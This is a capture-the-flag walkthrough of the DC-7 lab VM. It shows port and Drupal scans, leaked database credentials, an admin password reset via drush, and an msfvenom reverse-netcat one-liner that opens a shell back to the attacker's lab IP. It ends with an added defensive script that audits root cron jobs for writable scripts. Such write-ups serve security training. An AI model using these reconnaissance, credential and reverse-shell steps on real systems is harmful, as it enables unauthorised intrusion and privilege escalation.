DC 7
Hands-on walkthrough

┌──(root💀kali)-[~]
└─# nmap -p1-65535 192.168.32.166
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-13 01:44 EDT
Nmap scan report for 192.168.32.166
Host is up (0.00068s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 00:0C:29:85:DD:9B (VMware)
Nmap done: 1 IP address (1 host up) scanned in 2.66 seconds

┌──(root💀kali)-[/opt/droopescan-master]
└─# docker run droopescan scan drupal -u http://192.168.32.166
[+] No plugins found.
[+] Themes found:
startupgrowth_lite http://192.168.32.166/themes/startupgrowth_lite/
http://192.168.32.166/themes/startupgrowth_lite/LICENSE.txt
[+] Possible version(s):
8.7.0
8.7.0-alpha1
8.7.0-alpha2
8.7.0-beta1
8.7.0-beta2
8.7.0-rc1
8.7.1
8.7.10
8.7.11
8.7.12
8.7.13
8.7.14
8.7.2
8.7.3
8.7.4
8.7.5
8.7.6
8.7.7
8.7.8
8.7.9
[+] Possible interesting urls found:
Default admin - http://192.168.32.166/user/login
[+] Scan finished (0:02:01.475158 elapsed)

<?php
$servername = "localhost";
$username = "dc7user";
$password = "MdR3xOgB7#dW";
$dbname = "Staff";
$conn = mysqli_connect($servername, $username, $password, $dbname);
?>

dc7user@dc-7:~$ cat mbox
From root@dc-7 Thu Aug 29 17:00:22 2019
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Thu, 29 Aug 2019 17:00:22 +1000
Received: from root by dc-7 with local (Exim 4.89)
(envelope-from <root@dc-7>)
id 1i3EPu-0000CV-5C
for root@dc-7; Thu, 29 Aug 2019 17:00:22 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1i3EPu-0000CV-5C@dc-7>
Date: Thu, 29 Aug 2019 17:00:22 +1000
Database dump saved to /home/dc7user/backups/website.sql [success]
gpg: symmetric encryption of '/home/dc7user/backups/website.tar.gz' failed: File exists
gpg: symmetric encryption of '/home/dc7user/backups/website.sql' failed: File exists
dc7user@dc-7:~$ cat /opt/scripts/backups.sh
#!/bin/bash
rm /home/dc7user/backups/*
cd /var/www/html/
drush sql-dump --result-file=/home/dc7user/backups/website.sql
cd ..
tar -czf /home/dc7user/backups/website.tar.gz html/
gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --symmetric /home/dc7user/backups/website.sql
gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --symmetric /home/dc7user/backups/website.tar.gz
chown dc7user:dc7user /home/dc7user/backups/*
rm /home/dc7user/backups/website.sql
rm /home/dc7user/backups/website.tar.gz
dc7user@dc-7:~$ ls -al /opt/scripts/backups.sh
-rwxrwxr-x 1 root www-data 520 Aug 29 2019 /opt/scripts/backups.sh

dc7user@dc-7:/var/www/html$ ls
autoload.php composer.json composer.lock core example.gitignore index.php INSTALL.txt LICENSE.txt modules profiles README.txt robots.txt sites themes update.php vendor web.config
dc7user@dc-7:/var/www/html$ drush user-password admin --password=test
Changed password for admin

┌──(root💀kali)-[/opt/droopescan-master]
└─# msfvenom -p cmd/unix/reverse_netcat lhost=192.168.32.130 lport=9999 R
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder specified, outputting raw payload
Payload size: 100 bytes
mkfifo /tmp/yvixve; nc 192.168.32.130 9999 0</tmp/yvixve | /bin/sh >/tmp/yvixve 2>&1; rm /tmp/yvixve
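
The cron mail and the `ls -al` output earlier on this page show /opt/scripts/backups.sh running as root while its mode is -rwxrwxr-x with group www-data. The script below is an added example (not part of the original walkthrough) of a defender-side audit for that condition; the function names and fixture paths are constructed, it assumes /etc/crontab-style lines with a user field, and it checks mode bits only, not ownership.

```shell
#!/bin/sh
# Added example: audit a system-format crontab for root jobs whose script,
# or the directory holding it, is writable by group or other.

# is_loose PATH: succeeds when PATH has the group- or other-write bit set.
is_loose() {
    [ -n "$(find "$1" -prune \( -perm -020 -o -perm -002 \) -print 2>/dev/null)" ]
}

# root_cron_commands FILE: absolute command paths that run as root.
# Assumed layout: min hour dom mon dow user command [args...]
root_cron_commands() {
    awk 'NF >= 7 && $1 !~ /^#/ && $6 == "root" && $7 ~ /^\// { print $7 }' "$1" | sort -u
}

# audit_crontab FILE: one finding per line; no output when every job is tight.
audit_crontab() {
    root_cron_commands "$1" | while IFS= read -r cmd; do
        if [ ! -e "$cmd" ]; then echo "MISSING $cmd"; continue; fi
        if is_loose "$cmd"; then echo "WRITABLE_FILE $cmd"; fi
        dir=$(dirname "$cmd")
        if is_loose "$dir"; then echo "WRITABLE_DIR $dir"; fi
    done
}

# Constructed fixture mirroring the page: a root job on a 775 script, a 755
# script for contrast, and a non-root job. Prints the crontab path.
build_fixture() {
    d=$(mktemp -d) || return 1
    printf '#!/bin/sh\n' > "$d/backups.sh"; chmod 775 "$d/backups.sh"
    printf '#!/bin/sh\n' > "$d/rotate.sh";  chmod 755 "$d/rotate.sh"
    printf '%s\n' '# m h dom mon dow user command' \
        "0 * * * * root $d/backups.sh" \
        "0 3 * * * root $d/rotate.sh --quiet" \
        "0 4 * * * www-data $d/backups.sh" > "$d/crontab"
    echo "$d/crontab"
}

# Demo on the constructed fixture; on a real host pass /etc/crontab instead.
fixture=$(build_fixture)
audit_crontab "$fixture"
rm -rf "$(dirname "$fixture")"
```

On the fixture only the 775 script is reported; tightening it to 755 with root ownership of both file and directory clears the finding.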